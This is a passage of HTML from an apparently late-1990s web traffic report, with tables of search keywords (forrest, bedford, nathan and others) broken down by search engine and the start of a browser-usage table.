COLOR="#000000">nathan&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.31%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bedford&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.34%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">general&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">brice's&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">benefield&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">pictures&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">1865&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">andrew&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">crossroads&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>AltaVista&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bearers&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bedford&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">al&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">national&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">heritage&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">maeve&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathan&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">550&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">of&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Excite&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">pictures&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.46%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">preserve&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopSearchKeywords"><!--Referrers & Keywords::Top Search Keywords--></A> <!-- WT_H1>Top Search Keywords</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Search Keywords</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->The first table identifies keywords which led the most visitors to the site (regardless of the search engine). The second table identifies, for each keyword, which search engines led visitors to the site.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, .3, 3.7, 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Top Search Keywords</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Top Search Keywords</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Keywords</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Keywords found</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>forrest</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">110</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15.38%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>bedford</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">72</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.06%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathan</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">71</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.93%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>of</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">23</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.21%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>pictures</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.79%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>the</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>general</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.81%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klan</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klux</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathaniel</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD>&nbsp;</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Total Found for the Keywords Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>355</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>49.65%</B></TD> </TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total of Keywords Found in the Log File</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>715</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, 2, 2, 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Top Search Keywords with Engines Detail</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Top Search Keywords with Engines Detail</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Keywords</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Engines</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Searches</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>forrest&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">82</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.46%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.79%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Excite&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.55%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.55%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>bedford&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">58</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8.11%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.81%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathan&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">55</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.69%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.09%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>of&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.93%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>pictures&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Excite&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.41%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.27%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>the&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.81%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>general&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.25%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.55%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klan&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klux&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathaniel&nbsp;</B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopBrowsers"><!--Browsers & Platforms::Most Used Browsers--></A> <!-- WT_H1>Most Used Browsers</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Used Browsers</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the most popular WWW Browsers used by visitors to the site. This information will only be displayed if your server is logging the browser/platform information.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index20.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 2.7, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Top Browsers</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Most Used Browsers</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Browser</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Microsoft Internet Explorer</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">46474</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">73.73%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6622</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT 